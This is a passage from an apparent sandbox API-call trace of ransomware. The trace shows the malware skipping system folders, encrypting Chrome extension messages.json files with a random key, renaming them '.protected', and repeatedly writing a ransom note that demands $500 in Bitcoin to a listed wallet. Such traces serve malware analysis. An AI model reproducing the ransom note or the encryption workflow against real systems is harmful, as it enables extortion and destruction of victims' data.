halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.protected")) returned 1 [0078.605] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.605] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.605] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\RESTORE_FILES.txt") returned 159 [0078.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.605] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.605] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.606] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.606] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.606] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.606] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.607] CloseHandle (hObject=0x164) returned 1 [0078.607] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.607] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0078.607] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0078.607] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0078.607] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0078.607] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0078.607] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned 141 [0078.607] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0078.607] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0078.607] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*") returned 143 [0078.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.607] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.607] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.607] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.607] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.607] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.607] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\.") returned 143 [0078.607] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.607] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.608] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.608] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.608] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.608] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.608] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.608] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\..") returned 144 [0078.608] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.608] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.608] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.608] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.608] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.608] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.608] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.608] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.608] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.608] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.608] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.608] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.608] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.609] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.609] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.609] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.609] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.609] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.609] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.609] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x110, lpOverlapped=0x0) returned 1 [0078.610] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.610] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x110, lpOverlapped=0x0) returned 1 [0078.611] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.611] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.611] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.611] CloseHandle (hObject=0x168) returned 1 [0078.611] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.protected") returned 165 [0078.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.protected")) returned 1 [0078.612] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.612] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.612] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\RESTORE_FILES.txt") returned 159 [0078.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.612] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.612] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.613] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.613] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.613] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.613] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.613] CloseHandle (hObject=0x164) returned 1 [0078.613] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.613] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0078.614] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0078.614] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0078.614] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0078.614] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0078.614] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned 141 [0078.614] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0078.614] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0078.614] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*") returned 143 [0078.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.614] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.614] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.614] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.614] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.614] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.614] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\.") returned 143 [0078.614] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.614] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.614] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.614] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.614] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.614] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.614] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.614] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\..") returned 144 [0078.614] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.615] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.615] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.615] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.615] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.615] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.615] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.615] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.615] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.615] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.615] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.615] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.615] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.615] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.615] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.615] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.615] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.617] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.617] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.617] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.617] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.617] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.617] CloseHandle (hObject=0x168) returned 1 [0078.617] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.protected") returned 165 [0078.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.protected")) returned 1 [0078.618] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.618] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.618] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 